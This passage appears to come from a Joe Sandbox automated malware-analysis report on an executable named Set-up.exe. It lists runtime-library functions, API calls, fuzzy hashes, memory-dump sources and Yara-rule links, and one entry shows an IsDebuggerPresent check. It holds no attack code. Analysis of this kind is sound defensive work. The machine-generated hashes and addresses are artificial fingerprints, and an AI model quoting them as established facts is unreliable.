Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: AllocateHeap__invoke_watson_strlenmallocstrcpy_s
String ID:
API String ID: 2148476615-0
Opcode ID: f51a26993abf4da8e1a4fee8cda051f0ad1970d8c374e1880202262cd7a37b5d
Instruction ID: e525dfd4e8611400bec349607895078819e4a4dfe477ffac034e358bbd78c275
Opcode Fuzzy Hash: f51a26993abf4da8e1a4fee8cda051f0ad1970d8c374e1880202262cd7a37b5d
Instruction Fuzzy Hash: 29F0E2332080957F9B101DB5AC8489F7B59DE896E43111834E70992001EB2EE81182E0

Function 6BBAB44C Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BBAB453
??_U@YAPAXI@Z.MSVCR100(00000100,00000000,6BB9686B,00000000,?,?,?,6BBA5DCC,00000001), ref: 6BBAB474
_memset.LIBCMT(00000000,00000000,00000100,00000000,6BB9686B,00000000,?,?,?,6BBA5DCC,00000001), ref: 6BBAB485
??_U@YAPAXI@Z.MSVCR100(00000100,00000000,00000000,00000100,00000000,6BB9686B,00000000,?,?,?,6BBA5DCC,00000001), ref: 6BBAB4B1

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: H_prolog3_memset
String ID:
API String ID: 2828583354-0
Opcode ID: b73935e1ff5f72309c5baf8e443cae1eb6b09ac99b52775f1078ee8f28aa70aa
Instruction ID: 7ab29638e6404747789fa9900cc9b8d06778492ce5c49365f2281220321dce0a
Opcode Fuzzy Hash: b73935e1ff5f72309c5baf8e443cae1eb6b09ac99b52775f1078ee8f28aa70aa
Instruction Fuzzy Hash: 7811B3B1901B818FD3619F2A858125AFBF4FF18744F50482ED1DA8BB50D3B8A940CF81

Function 6BB64E90 Relevance: 6.0, APIs: 4, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.MSVCR100(6BB64EF0,0000000C,6BB89FD5,?,?,6BB69233,?), ref: 6BB64E9C
_lock.MSVCR100(0000000C), ref: 6BB64EB3

Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E

Part of subcall function 6BB64F0C: _unlock.MSVCR100(0000000C,6BB64EDD), ref: 6BB64F0E

_getptd.MSVCR100 ref: 6BB90771

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _getptd$CriticalEnterSection_lock_unlock
String ID:
API String ID: 2319614578-0
Opcode ID: f9807c7d9550d892b6b22f0892d9f23124c82e5bedd81cc0fd94688440efaac6
Instruction ID: 698b5c40933a6886e6dd37475ca407c1617911c26730ba3356224681f46fb95e
Opcode Fuzzy Hash: f9807c7d9550d892b6b22f0892d9f23124c82e5bedd81cc0fd94688440efaac6
Instruction Fuzzy Hash: D4012632909AD0EBDB14AB789842F0D33E0EF427E8F504299D414A7590FB7DCE41CE51

Function 6BB73567 Relevance: 6.0, APIs: 4, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

free.MSVCR100(?,?,?,?,?), ref: 6BB735BB

Part of subcall function 6BB6014E: HeapFree.KERNEL32(00000000,00000000,?,6BB87602,00000000), ref: 6BB60164

free.MSVCR100(?,?,?,?,?,?), ref: 6BB735C3
_errno.MSVCR100 ref: 6BB8831F
_invalid_parameter_noinfo.MSVCR100 ref: 6BB8832A

Part of subcall function 6BB733B8: _wcslen.LIBCMT(?), ref: 6BB7340B

Part of subcall function 6BB7373E: _memset.LIBCMT(?,00000000,00000044), ref: 6BB73786
Part of subcall function 6BB7373E: _calloc_crt.MSVCR100(?,00000001), ref: 6BB737E4
Part of subcall function 6BB7373E: __doserrno.MSVCR100 ref: 6BB7384A

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: free$FreeHeap__doserrno_calloc_crt_errno_invalid_parameter_noinfo_memset_wcslen
String ID:
API String ID: 1030453172-0
Opcode ID: 91a7d71734837c5b8f8d16bab574b0639bdf106c428656ce29e236cd97c71266
Instruction ID: 12303609964cd5297af795e3af27fae39d267c23d46f77d337541cba8bd67600
Opcode Fuzzy Hash: 91a7d71734837c5b8f8d16bab574b0639bdf106c428656ce29e236cd97c71266
Instruction Fuzzy Hash: FA011D76800188BBCF125FA5CC01ADE7B79EF04368F5042A0B924651B0E779CA61DB90

Function 6BB6BBB9 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6BB6BBC0
__AdjustPointer.MSVCR100(00000000,?,00000004,6BB6BCE1,00000000,?,?,?), ref: 6BB6BBEF
__AdjustPointer.MSVCR100(00000000,?,00000001,00000004,6BB6BCE1,00000000,?,?,?), ref: 6BB871EB
memcpy.MSVCR100(?,00000000,00000003,00000004,6BB6BCE1,00000000,?,?,?), ref: 6BB87211

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: AdjustPointer$H_prolog3_catchmemcpy
String ID:
API String ID: 738859832-0
Opcode ID: cbad7988759129df928cac1b685f461189e4a5b82f1e954310a3c75f88a7b1ef
Instruction ID: ebb33f89ce92d365641325ee3f81b20d653cb89bfc731d5e89e8a4b59f2ff65b
Opcode Fuzzy Hash: cbad7988759129df928cac1b685f461189e4a5b82f1e954310a3c75f88a7b1ef
Instruction Fuzzy Hash: 92014F72404684AAEF229F21DC03F9E3BB5EF05398F104415F95459070EBBAAEA5DA50

Function 6BB71201 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,6BB9085F), ref: 6BB71204
_malloc_crt.MSVCR100(00000002), ref: 6BB71233
memcpy.MSVCR100(00000000,00000000,00000002), ref: 6BB71242
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6BB7124B

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: EnvironmentStrings$Free_malloc_crtmemcpy
String ID:
API String ID: 202606007-0
Opcode ID: 3d8e4e0cce1d97ce2b8cd0a003d3587e1f6e30a4fa9e95e8020e9bd42ea9849e
Instruction ID: a7f0424db8e463cd3681516d00c71fe451e478a89879ed8832e91c2b1143aea5
Opcode Fuzzy Hash: 3d8e4e0cce1d97ce2b8cd0a003d3587e1f6e30a4fa9e95e8020e9bd42ea9849e
Instruction Fuzzy Hash: 28F0827B9059B06A8B317F35BC5589B2738EEC225431E04A6E412D3145FA69CE8183B2

Function 6BBA1664 Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCR100(?,?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002), ref: 6BBA1680
_memset.LIBCMT(?,00000000,00000000,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152), ref: 6BBA16A1
??3@YAXPAX@Z.MSVCR100(?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?), ref: 6BBA16AC
??3@YAXPAX@Z.MSVCR100(?,?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002), ref: 6BBA16B2

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ??3@$_memset
String ID:
API String ID: 1722558631-0
Opcode ID: 183182e7c4c582595b499faec1afdc5ad71ddb1a62ef8726871f1a58754acb8a
Instruction ID: 77c793859e16a4661a3ce1fcfb0459a8cb7f5353bd3f5d929f2e7aa323fb4737
Opcode Fuzzy Hash: 183182e7c4c582595b499faec1afdc5ad71ddb1a62ef8726871f1a58754acb8a
Instruction Fuzzy Hash: A2F0B4726087519BD3218E2EEC81A0B73E8FF81794B68483CF0D8C7160DB38ED82CA14

Function 6BBAAC51 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000018,6BBA0ED5,00010000,?), ref: 6BBAAC8D
GetLastError.KERNEL32 ref: 6BBAAC97
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBAACAF
_CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BBAACBD

Part of subcall function 6BBAABC4: GetModuleHandleA.KERNEL32(00000000), ref: 6BBAABDB
Part of subcall function 6BBAABC4: GetModuleFileNameW.KERNEL32(6BB50000,?,00000104), ref: 6BBAABF7
Part of subcall function 6BBAABC4: LoadLibraryW.KERNEL32(?), ref: 6BBAAC08

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Module$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorExceptionFileHandleLastLibraryLoadNameThreadThrow
String ID:
API String ID: 488853443-0
Opcode ID: 26ed972ceb31594155f97c6e737a7e2e73cf4f394bd3aa0598dec790c5c7c07c
Instruction ID: 330a8855ac9b62d698dbebade763f7ee1d9defbaf1d526957d9e61377a784fb0
Opcode Fuzzy Hash: 26ed972ceb31594155f97c6e737a7e2e73cf4f394bd3aa0598dec790c5c7c07c
Instruction Fuzzy Hash: A4F0C2329041865FDF09AFA0CC06BAE3B29EF04344F14007CF516C6161EB7AC9159FB5

Function 6BB60841 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

_memmove.LIBCMT(?,00000000,?), ref: 6BB60872
_errno.MSVCR100 ref: 6BB895F4
_invalid_parameter_noinfo.MSVCR100 ref: 6BB895FE
_errno.MSVCR100 ref: 6BB8960A

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo_memmove
String ID:
API String ID: 3898388434-0
Opcode ID: 2e998d1568a2c84ccd5ed2564f24117d1b0d34df2c28f38bec209859c6260524
Instruction ID: 428e00d19ff9969d22081ae1934e8b3b2f1cfd8145d536ae85fe8461019434ad
Opcode Fuzzy Hash: 2e998d1568a2c84ccd5ed2564f24117d1b0d34df2c28f38bec209859c6260524
Instruction Fuzzy Hash: BCF0E231144385EBDF115E69E8897DE3794EB04794F000065FC0496141F77CCC50CEA1

Function 6BB95C48 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

?_Abort@_StructuredTaskCollection@details@Concurrency@@AAEXXZ.MSVCR100 ref: 6BB95C68

Part of subcall function 6BBA504E: ?_Cancel@_StructuredTaskCollection@details@Concurrency@@QAEXXZ.MSVCR100(?,?,?,?,?,?,?,6BB95C6D), ref: 6BBA509A

__uncaught_exception.MSVCR100 ref: 6BB95C6D
Concurrency::unsupported_os::unsupported_os.LIBCMT(00000001), ref: 6BB95C93
_CxxThrowException.MSVCR100(6BB95CA8,6BBFFE24,00000001), ref: 6BB95CA1

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Collection@details@Concurrency@@StructuredTask$Abort@_Cancel@_Concurrency::unsupported_os::unsupported_osExceptionThrow__uncaught_exception
String ID:
API String ID: 176145414-0
Opcode ID: 0e84527e0fff4a2a2d01e8211534eaa136b194d9990ca591f8dc00a65845965b
Instruction ID: 414fcc63baf17e48c67bdd5c56f46760434240437c66d47fdd67ccba4411f53c
Opcode Fuzzy Hash: 0e84527e0fff4a2a2d01e8211534eaa136b194d9990ca591f8dc00a65845965b
Instruction Fuzzy Hash: 14F05E30C403846ACE00BA71A606B8C77B9CF0368DF4041F85A35AB452DBAED44BCB19

Function 6BB6A934 Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

_lock_file.MSVCR100(?,?,?,?,?,?,?,6BB6A990,0000000C), ref: 6BB6A961

Part of subcall function 6BB6A557: _lock.MSVCR100(?,?,?,6BBB6EA0,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BB6A584

_fclose_nolock.MSVCR100(?,?,?,?,?,?,?,6BB6A990,0000000C), ref: 6BB6A96C

Part of subcall function 6BB6A8DF: __freebuf.LIBCMT ref: 6BB6A903
Part of subcall function 6BB6A8DF: _fileno.MSVCR100(?,?,?), ref: 6BB6A909
Part of subcall function 6BB6A8DF: _close.MSVCR100(00000000,?,?,?), ref: 6BB6A90F

Part of subcall function 6BB6A9AC: _unlock_file.MSVCR100(?,6BB6A981,?,?,?,?,?,?,6BB6A990,0000000C), ref: 6BB6A9AD

_errno.MSVCR100(?,?,?,?,?,?,6BB6A990,0000000C), ref: 6BB88BC3
_invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6BB6A990,0000000C), ref: 6BB88BCE

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: __freebuf_close_errno_fclose_nolock_fileno_invalid_parameter_noinfo_lock_lock_file_unlock_file
String ID:
API String ID: 1403730806-0
Opcode ID: 75be2a504d5eabd53bb2de62eaa2684bfcd0c1a3cf7f724c91e153f008714c2a
Instruction ID: 3cc411b8a84aa096c13bab1aadd22e1a849bd786243d812e2d2a0bf296a4103e
Opcode Fuzzy Hash: 75be2a504d5eabd53bb2de62eaa2684bfcd0c1a3cf7f724c91e153f008714c2a
Instruction Fuzzy Hash: ADF0B430C017A5AADB109B79C842B5EBBA06F01378F318649D434AA1D0FB7C8E419F59

Function 6BBA23B9 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002), ref: 6BBA23C6

Part of subcall function 6BBA214D: std::exception::exception.LIBCMT(6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBA216C
Part of subcall function 6BBA214D: _CxxThrowException.MSVCR100(?,6BC00018,6BBA1FE2), ref: 6BBA2181

std::exception::exception.LIBCMT(?,00000008,00000002), ref: 6BBA23DE
_CxxThrowException.MSVCR100(?,6BC00034,?,00000008,00000002), ref: 6BBA23F3
?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000002), ref: 6BBA23FD

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Policy$Concurrency@@ElementExceptionKey@2@@Policy@SchedulerThrowValue@std::exception::exception
String ID:
API String ID: 1427302437-0
Opcode ID: acb3a4ef23f5604c129f93927a4bff63f9dd8f6626cd2d344cc28c0ef9438c6a
Instruction ID: 79e8f66df402cd98a6644b10774ab3dad87a6975e05345290289af448c6fc530
Opcode Fuzzy Hash: acb3a4ef23f5604c129f93927a4bff63f9dd8f6626cd2d344cc28c0ef9438c6a
Instruction Fuzzy Hash: 68F01971D08188BACB04EF65D442D9E7BFCDB45388F008065AA1597150DF78D644CB51

Function 6BB6CA89 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

_wfsopen.MSVCR100(?,?,00000080), ref: 6BB6CAA5
_errno.MSVCR100 ref: 6BB6D061
_errno.MSVCR100 ref: 6BB894E0
_invalid_parameter_noinfo.MSVCR100 ref: 6BB894EA

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo_wfsopen
String ID:
API String ID: 972587971-0
Opcode ID: 33518f1f829daef67386d686cdd8cb7bfa0aef1fa8333d9c5588fbc4d1558859
Instruction ID: f52c71ac5fb6d03b1452ccc22e74b67a7dd9bc2361f7f062959e7762a406675b
Opcode Fuzzy Hash: 33518f1f829daef67386d686cdd8cb7bfa0aef1fa8333d9c5588fbc4d1558859
Instruction Fuzzy Hash: A3E092316402A5ABDB215EB9AC02A9E37649F45B94F040061F9589B210FB79DC00CFC4

Function 6BBB6E6B Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCR100(6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BBB6E83
_invalid_parameter_noinfo.MSVCR100(6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BBB6E8E

Part of subcall function 6BBDAEAE: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6BBAB84F,?,6BBAC3D3,00000003,6BB874A4,6BB6AA18,0000000C,6BB874F7,00000001,00000001), ref: 6BBDAEB5

_lock_file.MSVCR100(00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BBB6E9B
_ungetc_nolock.MSVCR100(?,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BBB6EAB

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_invalid_parameter_noinfo_lock_file_ungetc_nolock
String ID:
API String ID: 3962069902-0
Opcode ID: cd07c99d1240b1d81f45b78a4ebd4a9ebffe70af729b31f50d4f3dcb4ccd44cf
Instruction ID: 4e9cfbda0d78eb90597851741c252df73f78e0fc4275446ea8a913f7faddf726
Opcode Fuzzy Hash: cd07c99d1240b1d81f45b78a4ebd4a9ebffe70af729b31f50d4f3dcb4ccd44cf
Instruction Fuzzy Hash: 92F01C31805285EADB10AFB9DC026AE7BA0AF00378F60C666E025991E0EF7D8E419F14

Function 6BB6380F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB8931E
_invalid_parameter_noinfo.MSVCR100 ref: 6BB89329

Strings

B, xrefs: 6BB63844

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: B
API String ID: 2959964966-1255198513
Opcode ID: 3393d93fd42d188c5bfc2d9a1213c1dfa9bde3f474556dc49e0ecf46112e7932
Instruction ID: 7fc6331da2aa3e55ea6f510c75429bd29896f933d32980a084508e280b16e6a1
Opcode Fuzzy Hash: 3393d93fd42d188c5bfc2d9a1213c1dfa9bde3f474556dc49e0ecf46112e7932
Instruction Fuzzy Hash: B7F0627490024EABDF048F65C8015EEBBB5FF84328F108225E924712D0D7798111CFA4

Function 6BB77D2D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000001,6BB6B0D8,6BB6BDD8,00000000,00000001), ref: 6BB77D51
free.MSVCR100(?), ref: 6BB77D77

Strings

csm, xrefs: 6BB77D32

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: DecodePointerfree
String ID: csm
API String ID: 2443025543-1018135373
Opcode ID: 02f8122a9d44f5beef324606df87255f6e8aadd2bc438feea7ae491f8b8642a7
Instruction ID: 8d165b4d280c697bb3355b5d19e4ef6736563e32c167627fc9a7319d6046a92f
Opcode Fuzzy Hash: 02f8122a9d44f5beef324606df87255f6e8aadd2bc438feea7ae491f8b8642a7
Instruction Fuzzy Hash: C2F0BE75606B809BDB34AE33C840D2A73BDEF113513640AACE4B5CA820EBA8D981C780

Function 6BBD583C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6BBD5871
DName::DName.LIBCMT ref: 6BBD587D

Strings

{flat}, xrefs: 6BBD586C

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: 1fd5b5c4196b8fe302af47c10bea4cf71ad71d0898fc248119f900a6b969cd69
Instruction ID: 0c739a8ac37a3157152ef6466a41bfb269e2bf2ea9ca2d121425f8b2d408ff4c
Opcode Fuzzy Hash: 1fd5b5c4196b8fe302af47c10bea4cf71ad71d0898fc248119f900a6b969cd69
Instruction Fuzzy Hash: ABF065352542849FCB04CF98E445BE43FB4EB42796F058085EA4C0F252C77AD541CB95

Analysis Process: Set-up.exePID: 5944, Parent PID: 2580COMMON

Non-executed Functions

Function 6C147FC2 Relevance: 10.6, APIs: 7, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C148920
_crt_debugger_hook.MSVCR100(00000001), ref: 6C14892D
